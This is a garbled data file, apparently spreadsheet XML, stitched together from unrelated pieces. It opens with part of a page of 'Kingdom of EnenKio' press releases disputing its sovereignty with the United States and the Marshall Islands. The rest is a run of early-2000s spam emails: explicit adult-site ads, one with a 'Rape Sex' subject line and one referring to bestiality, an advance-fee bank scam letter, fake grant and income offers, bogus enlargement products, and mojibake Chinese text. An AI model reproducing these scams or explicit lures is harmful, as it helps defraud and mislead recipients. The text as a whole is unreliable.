suffering of people residing in the Ratak atolls, under jurisdiction of
Iroijlaplap Hermios, and the RMI has rejected every suggestion to
coordinate prospective relief efforts through the said Iroijlaplap
Hermios.
The Ministry of Foreign Affairs and Trade of the Republic of the
Marshall Islands is steadfastly advised that any unilateral statements
or actions by the administration of the Republic of the Marshall Islands
which purport, seek or serve to diminish or question the credibility,
existence or authority of the government of the Kingdom of EnenKio in
the conduct of its affairs of state, without legitimate authentication
by a court of competent jurisdiction, are hereafter to be taken as
deliberate acts of aggression upon the Monarch of the Kingdom, His
Majesty King Remios, as Head of State, the government of the Kingdom of
EnenKio and its people, and will be countered with appropriate
responsive measures.
Furthermore, in light of the Ministry of Foreign Affairs and Trade of
the Republic of the Marshall Islands announcement concerning the Kingdom
of EnenKio, your attention is respectfully directed to the following
statement in the Preamble of the Constitution of the Marshall Islands,
then you decide for yourself:
"With this Constitution, we affirm our desire and right to live in peace
and harmony, subscribing to the principles of democracy, sharing the
aspirations of all other peoples for a free and peaceful world, and
striving to do all we can to assist in achieving this goal."
On behalf of His Majesty King Remios, we, administrators of the Kingdom
of EnenKio, have wholeheartedly agreed to pursue the same goal for a
free and peaceful world and have made no effort to the contrary.
(See also: Report on RMI Mismanagement)
SKIP TO NEXT FILE Â TOP OF PAGE
News Release, Part Two, June 1, 1999
Part Two Background:
The International Narcotics Control Strategy Report, 1998 (click on
reference # 2 below) released by the Bureau for International Narcotics
and Law Enforcement Affairs, U.S. Department of State, Washington DC,
February 1999, states as follows:
"Where Are OFCs Located?
[Paragraph 4] Thus, it is now possible for an enterprising jurisdiction
anywhere in the world to establish itself as an emerging OFC. The newest
OFCs, e.g., Niue and the Marshall Islands, are now sprouting in remote
areas of the world, such as the Pacific. Even more "remote" are mere
figments of fertile imaginations such as the Dominion of Malchizedek
(sic) or The Kingdom of Enenkio Atol (sic), both entirely fraudulent in
intent and practice." [note: OFC = Offshore Financial Center]
Response:
This unprovoked attack upon His Majesty King Remios, Monarch of the
Kingdom of EnenKio, the sovereign state of EnenKio and its noble
citizenry by the U.S. Department of State is a reprehensible
categorically false challenge of the sovereignty of the Kingdom of
EnenKio. It is also unjustifiably inflammatory and amounts to an
unqualified felonious defamation of the international reputation of His
Majesty King Remios, the government of the Kingdom of EnenKio and organs
thereof.
The unmitigated audacity and arrogance of the United States to attempt
to link the Kingdom of EnenKio with International Crime, narcotics
trafficking, money laundering, tax evasion, international drug cartels,
terrorists, bank fraud or any other sort of criminal activity, without
even one microscopic fragment of substantive evidence to corroborate
such deliberately nefarious statements is reprehensible in the least.
This public posting shall serve as constructive notice to the United
States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Furthermore, this matter will not be resolved until the President of the
United States issues a formal apology to His Majesty King Remios, along
with the government of the Kingdom of EnenKio, and the Congress of the
United States initiates a thorough investigation into the abuses of
power, subversion of natural rights and illegal occupation by the United
States of the islands and seas of Eneen-Kio Atoll. Congressional
representatives to Hawaii, the nearest State of the United States to
Eneen-Kio Atoll, and those of other states, have repeatedly been advised
of the foregoing atrocities and conditions and have failed to respond in
kind. The United States is obligated as the self-assured trustee of
Pacific Island States in Micronesia to respond to the charges of "ethnic
cleansing" and her responsibility to EnenKio is no less.
For further information and links to documents, see:
EnenKio Documents
http://www.state.gov/www/global/narcotics_law/1998_narc_report/ml_intro.html
http://www.state.gov/www/global/narcotics_law/1998_narc_report/index.html
March 16, 1999: News Release
The impact of the passing on December 10 of His Majesty Murjel Hermios,
First Monarch of the Kingdom of EnenKio, Iroijlaplap of the Northern
Ratak Atolls of the Marshall Islands, beloved husband and father, was
felt throughout the society.Ã‚Â  Flags were flown at half mast for a
week
in the Marshalls and for a a month at EnenKio Consulates around the
world.Ã‚Â  His remains were interred in a remote site reserved for the
highest ranking chiefs, according to Marshallese custom.
Ã‚Â 
His Majesty King Remios Hermios
Second Monarch of the Kingdom of EnenKio
He was succeeded to the throne by his younger brother, Remios, who will
formally accept the staff of authority as Second Monarch, titular Head
of State of the Kingdom of EnenKio in ceremonies being planned.Ã‚Â 
His
Majesty Remios Hermios was a retired educator in the Marshalls and
maintains a home in the Ratak Atolls. His successor is designated to be
his brother, HRH Crown Prince Lobadreo Hermios.
For further information, contact the State Secretary back on the home
page.
SKIP TO NEXT FILE Â TOP OF PAGE
March 1999 -- Comments to readers from the Ministry of Foreign Affairs:
Subject: A "State of War" Declaration
The Kingdom of EnenKio recognizes that an unresolved conflict of
interests exists between it and the United States Government.Ã‚Â  The
United States government, admittedly at a time of colonial expansionism,
appears to have violated the l</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</si>
  <si>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Now!!!If above link doesn't work, Click Here
Â 
2394YTyQ5-342YskU3943ol21--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Down!"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Â Â 
- Ricardo &amp; Isabelle P. of Las Vegas, NV
SUPER
                    VigoralFor
                    Men
SUPER                    VigoretteFor
                    Women
SUPER
VigorgelFor
                    Everyone!All
      Only  $24.99 each &amp; Get FREE Shipping!*-LIMITED
      TIME OFFER-
-&gt;
      CLICK
      HERE TO ORDER NOW! &lt;-Â Your
      email address was obtained from an opt-in list, Opt-in MRSA List  Â Purchase
      Code # 248-3-550.Â Â If you wish to be unsubscribed from this list, please
      Click
      here and press send to be removed. If you have previously
      unsubscribed and are still receiving this message, you may email our Abuse
      Control Center. We do not condone spam in any shape or form. Thank You
      kindly for your cooperation
*Note: free shipping on orders of
three or more of any product.
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear juanzec ,Rape Sex!CLICK HERE
=============================================================
Do you like sexy animals doing the wild thing? We have the super hot content on the Internet!
This is the site you have heard about. Rated the number one adult site three years in a row!
- Thousands of pics from hardcore fucking, and cum shots to pet on girl.
- Thousands videos
So what are you waiting for?CLICK HEREYOU MUST BE AT LEAST 18 TO ENTER!Â Â Â 
To not be on our "in house" address database
 CLICK HERE and you will eliminated from future mailings. [9^":}H&amp;*TG0BK5NKIYs5]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</si>
  <si>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Do you Have an Inkjet or Laser Printer?Â 
        Do
        you Have an Inkjet or Laser Printer?Yes? Then we can SAVE
        you $$$ Money!
Our High Quality Ink &amp; Toner Cartridges come
        with a money-back guarantee, a 1-year
        Warranty*, and get FREE 3-Day SHIPPING
        !*
and best of all...They Cost
         up to 80%  Less        than
        Retail Price!*Click here
        to visit Our Website!*or Call us Toll-Free @
        1-800-758-8084!
*90-day warranty on remanufactured
        cartridges. Free shipping on orders over $40
Â 
Â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</si>
  <si>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Free passwordsGET PORN FOR FREEFREE PASSWORD TO:
18 &amp; ASIAN
HUGE TITS XXX
FREE AMATEUR HOTTIES
FREE TEEN HOTTIES
FREE AND KINKY
FREE FARM SLUTS
FREE n' FAMOUSAdults onlyDiligent
</t>
  </si>
  <si>
    <t>Dear lsb36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[*TG0B]</t>
  </si>
  <si>
    <t xml:space="preserve"> A man endowed with a 7-8" hammer is simply
 better equipped than a man with a 5-6"hammer. 
Would you rather havemore than enough to get the job done or fall short. It's totally upto you. Our Methods are guaranteed to increase your size by 1-3" Come in here and see how--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Beaton Abused, Humiliated and Begging For More!!!Our Sluts Won't 
Disappoint!!Click Here
Â 
Â 
Â 
YOU MUST BE AT LEAST 18 TO ENTER!
=============================================================To be 
removed from our "in house" mailing list CLICK HEREand you 
will automatically be removed from future mailings.You have received 
this email by either requesting more informationon one of our sites or 
someone may have used your email address.If you received this email in 
error, please accept our 
apologies.=============================================================
</t>
  </si>
  <si>
    <t xml:space="preserve">
Â  Does
Anyone REALLY Make Any Money Online?Or is it all ONE BIG SCAM?!
Â Â Â Â 
FACT:
We earned $26,087.58 in 94 days - and we can PROVE it!
Â Another
FACT:
"Everyone Can Do It" is a LIE!!!
HINT:
"DUPLICATION" Does NOT Work!"DELEGATION"
Does!No
B.S. here - SEE OUR ACTUAL CHECKS! See EXACTLY how we made that money - and how
we have helped OTHERS make money also!
Â 
Julie P. earned $750 in one week with usÂ  Jeff A. earned $6500 in 5 weeks with usÂ 
Kate B. earned $740 in 11 days with us
Let us MAIL YOU this
FREE CD -
see our checks AND how we did it!
Send yourÂ 
Name
Street Address
City, State/Province Zip
Country
Phone
to defglass@excite.com?subject=FREE_CD
Â Â Â Â Â Â Â Â  Time is running out, check this out TODAY!
Â 
=================================================================
To be removed from our mailing list, please mailto:defglass@excite.com?subject=REMOVE
and your request will be honored immediately. Thanks.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</si>
  <si>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For women ages 13 to 60 plus....
As seen on TV....
Safely Make Your Breasts
Bigger and Fuller 
In the privacy of your own home.Guaranteed quick resultsClick Here For Full Report
mcskjfirglkckubuvfiwwp--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Dear Homeowner, Interest Rates are at their lowest point in 40 years! We help you find the 
best rate for your situation by matching your needs with hundreds of 
lenders!Home Improvement, Refinance, Second Mortgage, 
Home Equity Loans, and much, much more!
You're eligible even with less than perfect credit!
This service is 100% FREE to home owners and new home buyers 
without any obligation. Where others say NO, we say YES!!!http://www243.wiildaccess.com
Take just 2 minutes to complete the following form.
There is no obligation, all information is kept strictly
confidential, and you must be at least 18 years of age.  
Service is available within the United States only.
This service is fast and free. http://www243.wiildaccess.com
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++To opt out:http://www243.wiildaccess.com/optout.html
8960ryoE6-752DjSn8958wQDd4-522UPqi8940xzrR4-094LKl46
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir,   *Â¡Â°Ã–ÃÃ‚Â·ÃÂ¨Ã…Ã¤Â¼Ã¾Â³Â§Â¡Â±Ã—Â¨Ã’ÂµÃ‰ÃºÂ²ÃºVEÂ±ÃƒÃÂ·(VEÂ·Ã–Ã…Ã¤Â±ÃƒÂ±ÃƒÃÂ·Ã—ÃœÂ³Ã‰),Ã–Ã·Ã’ÂªÃÃÂºÃ…Ã“Ã
    ÃŽÃ¥ÃŠÂ®ÃÃ¥4JB1,Â¿ÂµÃƒÃ·Ã‹Â¹6BT,Ã’Ã€ÃŽÂ¬Â¿Ã‚ÂµÃÃ…Ã…Â·Ã…,ÃŽÃ¥ÃŠÂ®ÃÃ¤Ã†Â¤Â¿Â¨.....	
 * Ã–ÃÃ‚Â·ÃÂ¨Ã…Ã¤Â¼Ã¾Â³Â§Ã“ÃÂ¶Ã Ã„ÃªÃ‰ÃºÂ²ÃºVEÂ±ÃƒÃÂ·ÂµÃ„Â¾Â­Ã‘Ã©, Ã—Ã·ÃŽÂªÂ½ÃÃ”Ã§Â½Ã¸ÃˆÃ«Ã“ÃÂ±ÃƒÃ“ÃÃ—Ã¬ÃÃ
   Ã’ÂµÂµÃ„Ã—Â¨Ã’ÂµÂ³Â§,ÃŽÃ’ÃƒÃ‡ÃŠÂ±Â¿ÃŒÂ¸ÃºÃ—Ã™Â¹ÃºÂ¼ÃŠÂ¸Ã·ÂµÃ˜Ã†Ã¤Ã‹Ã¼Â²Ã±Ã“ÃÃˆÂ¼Ã“ÃÃ…Ã§Ã‰Ã¤ÃÂµÃÂ³ÂµÃ„Ã–Ã†
   Ã”Ã¬Ã‰ÃŒÂµÃ„Ã‰ÃºÂ²ÃºÂ¹Â¤Ã’Ã•,Â²Â¢Ã‡Ã’Â²Â»Â¶ÃÃŽÃ¼ÃŠÃ•Â¹ÃºÂ¼ÃŠÃ‰ÃÃ—Ã®ÃÃˆÂ½Ã¸ÂµÃ„Â¼Ã“Â¹Â¤,Â²Ã¢ÃŠÃ”Â¹Â¤.Â²ÃºÃ†Â·ÂµÃ„
   Ã–ÃŠÃÂ¿ÂºÃÃÃ¢Â¹Ã›ÃÂ¬Â¹ÃºÃÃ¢ÃÂ¬Ã€Ã Â²ÃºÃ†Â·ÃÃ ÂµÂ±.  * ÃˆÃ§Â¶Ã”ÃŽÃ’ÃƒÃ‡ÂµÃ„Â²ÃºÃ†Â·Â¸ÃÃÃ‹ÃˆÂ¤,Ã‡Ã«ÃÂ¨Ã–ÂªÃŽÃ’ÃƒÃ‡.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t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir,   *Â¡Â°Ã–ÃÃ‚Â·ÃÂ¨Ã…Ã¤Â¼Ã¾Â³Â§Â¡Â±Ã—Â¨Ã’ÂµÃ‰ÃºÂ²ÃºVEÂ±ÃƒÃÂ·(VEÂ·Ã–Ã…Ã¤Â±ÃƒÂ±ÃƒÃÂ·Ã—ÃœÂ³Ã‰),Ã–Ã·Ã’ÂªÃÃÂºÃ…Ã“Ã
    ÃŽÃ¥ÃŠÂ®ÃÃ¥4JB1,Â¿ÂµÃƒÃ·Ã‹Â¹6BT,Ã’Ã€ÃŽÂ¬Â¿Ã‚ÂµÃÃ…Ã…Â·Ã…,ÃŽÃ¥ÃŠÂ®ÃÃ¤Ã†Â¤Â¿Â¨.....	
 * Ã–ÃÃ‚Â·ÃÂ¨Ã…Ã¤Â¼Ã¾Â³Â§Ã“ÃÂ¶Ã Ã„ÃªÃ‰ÃºÂ²ÃºVEÂ±ÃƒÃÂ·ÂµÃ„Â¾Â­Ã‘Ã©, Ã—Ã·ÃŽÂªÂ½ÃÃ”Ã§Â½Ã¸ÃˆÃ«Ã“ÃÂ±ÃƒÃ“ÃÃ—Ã¬ÃÃ
   Ã’ÂµÂµÃ„Ã—Â¨Ã’ÂµÂ³Â§,ÃŽÃ’ÃƒÃ‡ÃŠÂ±Â¿ÃŒÂ¸ÃºÃ—Ã™Â¹ÃºÂ¼ÃŠÂ¸Ã·ÂµÃ˜Ã†Ã¤Ã‹Ã¼Â²Ã±Ã“ÃÃˆÂ¼Ã“ÃÃ…Ã§Ã‰Ã¤ÃÂµÃÂ³ÂµÃ„Ã–Ã†
   Ã”Ã¬Ã‰ÃŒÂµÃ„Ã‰ÃºÂ²ÃºÂ¹Â¤Ã’Ã•,Â²Â¢Ã‡Ã’Â²Â»Â¶ÃÃŽÃ¼ÃŠÃ•Â¹ÃºÂ¼ÃŠÃ‰ÃÃ—Ã®ÃÃˆÂ½Ã¸ÂµÃ„Â¼Ã“Â¹Â¤,Â²Ã¢ÃŠÃ”Â¹Â¤.Â²ÃºÃ†Â·ÂµÃ„
   Ã–ÃŠÃÂ¿ÂºÃÃÃ¢Â¹Ã›ÃÂ¬Â¹ÃºÃÃ¢ÃÂ¬Ã€Ã Â²ÃºÃ†Â·ÃÃ ÂµÂ±.  * ÃˆÃ§Â¶Ã”ÃŽÃ’ÃƒÃ‡ÂµÃ„Â²ÃºÃ†Â·Â¸ÃÃÃ‹ÃˆÂ¤,Ã‡Ã«ÃÂ¨Ã–ÂªÃŽÃ’ÃƒÃ‡.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Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie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</si>
  <si>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oceanside
</t>
  </si>
  <si>
    <t xml:space="preserve">
 We won't lie to you, smaller IS better.......
.
.
.
.
.
.
.
.
When you're talking about SUPERCOMPUTERS! We HATE to break it to you guys, but women don't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1" to 4.5" to your penis size! Without surgery, pumps, or other painful methods.  
"I'm convinced, let me get access to these,
 AMAZING TECHNIQUES ONLINE!"    
Every man on the planet would like to increase 
his penis SIZE and WIDTH, and we can show you how to do BOTH!  
Don't be Fooled by methods that only increase your LENGTH!
Increase the LENGTH and WIDTH of your penis!
  SAFELY and NATURALLY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</si>
  <si>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
Hello, fork@xent.comHuman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 Click HereOR 
  Here  You are receiving this email as a subscriber
  to the Opt-In America Mailing List. 
To remove yourself from all related maillists,just Click Here
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Could YOU use a *FREE* GRANT?
This is a limited offer for all those in need of a Free Grant.
  And those that qualify will be eligible for up to but, 
not exceeding $5,000,000. 
Most FREE grants are from  $10,000 To $156,000. DO I QUALIFY?
DID YOU KNOW? 
No longer are Free Grants the domain of the privileged and choice few, 
but now they can be awarded to everyday people like you.   
All applicants are treated EQUAL regardless of race, creed, financial situation or credit stability.
THE BONUSThe best thing about the Free Grant Program is that it requires:
 No credit checks, No credit history information, No co-signers,
No collateral, No employment checks, No income verification,
No higher education and even No special skills.SEE IF YOU QUALIFY NOW!
</t>
  </si>
  <si>
    <t>Dear LAXPress.com customer,You are receiving this email as a result of having joined one of our opt-in adults only newsletter services.If you feel this is in error or someone added your email address without your authorization, please scroll to the BOTTOM of this email and click on the "remove" hyperlink. You will be removed AUTOMATICALLY.THIS MONTH'S SPECIAL OFFERS!* * * * * FREE Personals * * * * *For a limited time, we are offering all our customers the option to place their own adults only personals (PHOTO OR NON-PHOTO) ad at LAXPress.com AT NO CHARGE! * * * * * FREE LIVE NUDE CHATROOMS | NO CHARGE FOR ACCESS ! * * * * *Get access to live nude chatrooms from all over the world featuring sexy girls and guys! Sincerely,Nicole Webster
http://www.laxpress.com/?opt-in-newsletter
P.S. Looking for a great adult search engine? Go to http://www.sexindexer.com/?laxpressAlso, check out these 50 NEW ultimate adults only sites!http://www.laxpress.com/50SITES/adultupskirts.html
http://www.laxpress.com/50SITES/allpetite.html
http://www.laxpress.com/50SITES/amateurfreedom.html
http://www.laxpress.com/50SITES/amateuruniversity.html
http://www.laxpress.com/50SITES/analdebutants.html
http://www.laxpress.com/50SITES/asianexxxstacy.html
http://www.laxpress.com/50SITES/averagegirls.html
http://www.laxpress.com/50SITES/bearlovin.html
http://www.laxpress.com/50SITES/blackdesires.html
http://www.laxpress.com/50SITES/boytoylive.html
http://www.laxpress.com/50SITES/breathlessboys.html
http://www.laxpress.com/50SITES/chixwithdix.html
http://www.laxpress.com/50SITES/cutegirlfriend.html
http://www.laxpress.com/50SITES/dailyxxxstories.html
http://www.laxpress.com/50SITES/darkdamsels.html
http://www.laxpress.com/50SITES/darkobsessions.html
http://www.laxpress.com/50SITES/dudedorm.html
http://www.laxpress.com/50SITES/ebonyonivory.html
http://www.laxpress.com/50SITES/eldererotica.html
http://www.laxpress.com/50SITES/expectingsex.html
http://www.laxpress.com/50SITES/exquisiteasians.html
http://www.laxpress.com/50SITES/extremesex.html
http://www.laxpress.com/50SITES/fantasticfacials.html
http://www.laxpress.com/50SITES/fatfantasies.html
http://www.laxpress.com/50SITES/femdomination.html
http://www.laxpress.com/50SITES/gayultra.html
http://www.laxpress.com/50SITES/goldentrickle.html
http://www.laxpress.com/50SITES/granniesnfatties.html
http://www.laxpress.com/50SITES/hardcoredigital.html
http://www.laxpress.com/50SITES/hardcoremaidens.html
http://www.laxpress.com/50SITES/hardinterracial.html
http://www.laxpress.com/50SITES/hentaistudios.html
http://www.laxpress.com/50SITES/justtoons.html
http://www.laxpress.com/50SITES/ladiessecret.html
http://www.laxpress.com/50SITES/latinafetish.html
http://www.laxpress.com/50SITES/legsnfeet.html
http://www.laxpress.com/50SITES/lesbianbordello.html
http://www.laxpress.com/50SITES/lickinlovers.html
http://www.laxpress.com/50SITES/massivemammories.html
http://www.laxpress.com/50SITES/maturedames.html
http://www.laxpress.com/50SITES/maturetouch.html
http://www.laxpress.com/50SITES/orallovers.html
http://www.laxpress.com/50SITES/pinkchocolate.html
http://www.laxpress.com/50SITES/pussyquota.html
http://www.laxpress.com/50SITES/rawsexvideos.html
http://www.laxpress.com/50SITES/seemepee.html
http://www.laxpress.com/50SITES/sexyblondes.html
http://www.laxpress.com/50SITES/sexybrunettes.html
http://www.laxpress.com/50SITES/sexyredheads.html
http://www.laxpress.com/50SITES/sexysmokers.html
http://www.laxpress.com/50SITES/sexytranssexual.html
http://www.laxpress.com/50SITES/shemalelounge.html
http://www.laxpress.com/50SITES/sinfulhardcore.html
http://www.laxpress.com/50SITES/teenboyz.html
http://www.laxpress.com/50SITES/teendreamer.html
http://www.laxpress.com/50SITES/teenmaidens.html
http://www.laxpress.com/50SITES/totallytits.html
http://www.laxpress.com/50SITES/uniformboys.html
http://www.laxpress.com/50SITES/voyeuraddicts.html
http://www.laxpress.com/50SITES/voyeurdorm.html
http://www.laxpress.com/50SITES/voyeurlounge.html-------------------------------------------------------------------------
To be removed from this mailing list
click on the link below 
http://www.laxpress.com/cgi-bin/emailoptin/mail.pl?jm@netnoteinc.com</t>
  </si>
  <si>
    <t xml:space="preserve">=================================Guaranteed to increase, lift and firm your
breasts in 60 days or your money back!!100% herbal and natural.  Proven formula since 
1996.  Increase  your bust by 1 to 3 sizes within 30-60 
days and be all natural.  Click here:
http://64.123.160.91:81/li/wangxd/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http://64.123.160.91:81/li/gg/unsubscriber.asp?userid=ilug-admin@linux.ie-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir,My name is Mr. Obi W, the manager, credit and foreign bills of Eco
Bank Plc. I am writing in respect of a foreign customer of my bank
with account number 14-255-2004/utb/t who perished in a plane crash
[Korean Air Flight 801] with the whole passengers aboard on August 6,
1997.Since the demise of this our customer, I personally has watched
with keen interest to see the next of kin but all has proved abortive
as no one has come to claim his funds of usd.20.5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25% of the total.Upon the receipt of your response, I will send you by fax or e-mail
the application, bank's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deceased.When you receive this letter. Kindly send me an e-mail signifying
Your decision including your private Tel/Fax numbers for quick
communication.Respectfully submitted,Obi   W.
</t>
  </si>
  <si>
    <t xml:space="preserve">STOP 
  PAYING FOR PORN
You will 
  be amazed how easy it is!!!! 
GETTING 
  FREE XXX PASSWORDS IS EASY,
  WE'LL SHOW YOU HOW!!!
CLICK 
  HERE 
  TO GET YOUR FREE PASSWORDS
Â Â 
Â 
Â 
Â 
Â 
Â 
Â 
Â Removal Instructions:You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24hours for removal.This e-mail is sent in compliance with the Information Exchange Promotion and Privacy Protection Act. section 50 marked as 'Advertisement' with valid 'removal' instruction.
Â 331611865443
</t>
  </si>
  <si>
    <t xml:space="preserve">=================================Guaranteed to increase, lift and firm your
breasts in 60 days or your money back!!100% herbal and natural.  Proven formula since 
1996.  Increase  your bust by 1 to 3 sizes within 30-60 
days and be all natural.  Click here:
http://64.123.160.91:81/li/wangxd/
http://202.101.163.34:81/li/wangxd/Absolutely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http://64.123.160.91:81/li/gg/unsubscriber.asp?userid=jm@netcom20.netcom.com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</si>
  <si>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ds
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">ï¿½ï¿½ï¿½Iï¿½ï¿½ï¿½ï¿½ï¿½zï¿½ï¿½ï¿½{ï¿½iï¿½ï¿½ï¿½ï¿½ï¿½Wï¿½Hï¿½ï¿½ IDOL1000ï¿½jï¿½Iï¿½Hï¿½Uï¿½Oï¿½zï¿½ï¿½ï¿½Jï¿½ï¿½ï¿½ï¿½ï¿½eï¿½G
 (noprovisions@bonbox.cz) on ï¿½Pï¿½ï¿½ï¿½ï¿½, 7 ï¿½ï¿½ 27, 2002 at 08:33:41
---------------------------------------------------------------------------
ï¿½ï¿½ï¿½ï¿½ï¿½G     Life-Time upgrades for FREE guarantees6s2n2k6
: Why Spend upwards of $4000 on a DVD Burner when we will show you an alternative that will do the exact same thing for just a fraction of the cost? Copy your DVD's NOW. Best Price on the net. Click here: http://010@www.dvdcopyxp.com/cgi-bin/enter.cgi?marketing_id=dcx002 Click to remove http://011@www.spambites.com/cgi-bin/enter.cgi?spambytes_id=100115 
---------------------------------------------------------------------------
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">IMPORTANT INFORMATION:The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9882eXl6
</t>
  </si>
  <si>
    <t xml:space="preserve">When America's top companies compete for your business, you win.http://four87.six86.com/sure_quote/sure_quote.htmTake a moment to let us show you that we are here to save you money and address your concerns
with absolutely no hassle, no obligation, no cost quotes, on all your needs, from America's
top companies.-Life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well.http://four87.six86.com/sure_quote/sure_quote.htm"...was able to get 3 great offers in
less than 24 hours." -Jennifer C"Met all my needs... being able to search
for loans in a way that puts me in control." -Robert T."..it was easy, effortless...!"-Susan A. Click here to delete your address from future updates.
http://four87.six86.com/sure_quote/rm/
</t>
  </si>
  <si>
    <t xml:space="preserve">
 We won't lie to you, smaller IS better.......
.
.
.
.
.
.
.
.
When you're talking about SUPERCOMPUTERS! We HATE to break it to you guys, but women don't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1" to 4.5" to your penis size! Without surgery, pumps, or other painful methods.  
"I'm convinced, let me get access to these,
 AMAZING TECHNIQUES ONLINE!"    
Every man on the planet would like to increase 
his penis SIZE and WIDTH, and we can show you how to do BOTH!  
Don't be Fooled by methods that only increase your LENGTH!
Increase the LENGTH and WIDTH of your penis!
  SAFELY and NATURALLY
</t>
  </si>
  <si>
    <t xml:space="preserve">â€101æ•™è‚²ç½‘â€œæŽ¨èã€Šé­”é¬¼è‹±è¯­ã€‹
â€ä¸­å›½æ•™è‚²ç½‘â€œæŽ¨èã€Šé­”é¬¼è‹±è¯­ã€‹ 
ç¨¿ä»¶ï¼šå¦‚ä½•é—ª(FLASH)çš„æ›´é…·ä¸€ç‚¹
ç¨¿ä»¶ï¼šé‡Žè›®å¥³å‹å–œæ¬¢ä¸­å›½é…·å“¥
ç¨¿ä»¶ï¼šeæ—¶ä»£ï¼Œé—ªå®¢ä¸æ•Œé…·å®¢
ç¨¿ä»¶ï¼šã€ŠFlashé…·å­—é›†ã€‹&amp;ã€Šé­”é¬¼è‹±è¯­ã€‹
ã€ŠFlashé…·å­—é›†ã€‹"å²ä¸Šæœ€å¼ºä¹‹æ•°å­—åŒ–ä¸­æ–‡å¼•æ“Ž"
ã€Šé­”é¬¼è‹±è¯­ã€‹"ä¸ç”¨å­¦è¯­æ³• ä¸ç”¨èƒŒå•è¯"åˆä¸­ç”Ÿä¹Ÿèƒ½çœ‹è‹±è¯­åŽŸç‰ˆâ€œå¤§ç‰‡â€ï¼
          çœ‹ã€Šæ˜Ÿçƒå¤§æˆ˜ã€‹ï¼Œå­¦ã€Šé­”é¬¼è‹±è¯­ã€‹ï¼
=====================================
ã€ŠFlashé…·å­—é›†ã€‹"å²ä¸Šæœ€å¼ºä¹‹æ•°å­—åŒ–ä¸­æ–‡å¼•æ“Ž"ã€€ã€€ã€ŠFlashé…·å­—é›†ã€‹ åˆåã€Šä¸­åŽå¤§å­—åº“ã€‹Flashç‰ˆï¼Œæ˜¯ã€Šä¸­åŽå¤§å­—åº“ã€‹çš„æœ€æ–°ç‰ˆæœ¬ï¼Œç³»ç”±ä¸­å›½å‘æ˜Žåä¼šä¼šå‘˜ä½•æµ·ç¾¤å…ˆç”ŸåŽ†æ—¶åå¹´ï¼Œè€—èµ„å·¨å¤§å®Œæˆçš„ä¸€å¥—è¶…å¤§åž‹ä¸­æ–‡ä¸ªæ€§åŒ–æ•°ç å­—åº“ï¼Œè¢«èª‰ä¸ºâ€œå²ä¸Šæœ€å¼ºä¹‹æ•°å­—åŒ–ä¸­æ–‡å¼•æ“Žâ€ã€‚
ã€€ã€€æœ€æ–°æŽ¨å‡ºçš„ã€ŠFlashé…·å­—é›†ã€‹å…±æ”¶å½•äº†1000åƒå¤šå¥—TRUETYPEä¸­æ–‡å­—åž‹ï¼Œæ˜¯ç›®å‰å…¨çƒé¦–å¥—çªç ´â€œåƒå¥—â€å­—åž‹å¤§å…³çš„æ•°å­—åŒ–ä¸­æ–‡ç”µè„‘å­—åº“ï¼Œä¹Ÿæ˜¯å”¯ä¸€èƒ½å¤Ÿæä¾›åƒå¥—çº§è§£å†³æ–¹æ¡ˆçš„ä¸­æ–‡ä¸ªæ€§åŒ–ç³»ç»Ÿå¹³å°ï¼Œæ˜¯â€œeæ—¶ä»£â€æ‹“å±•ç”µå­å•†åŠ¡é¦–é€‰çš„ä¸­æ–‡å¹³å°ã€‚
ã€€ã€€åœ¨é•¿è¾¾åå¹´çš„ç ”å‘è¿‡ç¨‹å½“ä¸­ï¼Œæœ‰å…³æŠ€æœ¯äººå‘˜å…‹æœç§ç§å›°éš¾ï¼Œåˆ›å»ºäº†ä¸€æ•´å¥—ç³»ç»ŸåŒ–ã€ç§‘å­¦åŒ–çš„ä¸­æ–‡æ±‰å­—å½¢æ€ç ”ç©¶ç†è®ºã€æ•°å­¦æ¨¡åž‹åŠå®žç”¨æ–¹æ¡ˆï¼Œå¹¶å»ºæˆå…¨çƒé¦–ä¸ªè¶…å¤§åž‹çš„æ±‰å­—å½¢æ€çŸ¥è¯†åº“ï¼Œæ€»å®¹é‡è¶…è¿‡600Gï¼Œæ˜¯ç›®å‰å…¨çƒæœ€å¤§çš„ä¸­æ–‡æ±‰å­—å½¢æ€çŸ¥è¯†åº“ã€‚
ã€€ â€œå¹¿å‘Šä¸šå¯¹å­—åž‹è¦æ±‚æžä¸¥ï¼Œé™¤ä¼ ç»Ÿå­—åž‹å¤–ï¼Œæ›´å¤šçš„æ˜¯éœ€è¦æ–°æ¬¾æ‰‹å†™åž‹åŠå„ç±»ç‰¹ç§å­—åž‹ã€‚â€
ã€€ ã€Šä¸­åŽå¤§å­—åº“ã€‹æä¾›äº†å¤§é‡åŽŸåˆ›ã€åŠåŽŸåˆ›"æ–°æ¬¾æ‰‹å†™åž‹"åŠå„ç±»"ç‰¹ç§å­—åž‹"ï¼Œä¾‹å¦‚ï¼šè‚ ä»”ä½“ã€åˆšå¤ä½“ã€å‰ªçº¸ä½“ã€æœ¨åˆ»ä½“ã€çŸ³å°ä½“ã€è‚¥ä»”ä½“ã€é¡½ç«¥ä½“ã€å¯Œè´µä½“ã€è‰èŽ“ä½“ã€æ•°ç ä½“ã€â€¦â€¦ã€ç­‰ç­‰ã€‚æ˜¯ç½‘ç»œå…¬å¸ã€å¹¿å‘Šè¡Œä¸šåŠä¸“ä¸šè®¾è®¡å¸ˆçš„é¦–é€‰ä¸ªæ€§åŒ–ä¸­æ–‡å¹³å°åˆ›ä½œå¹³å°ã€‚
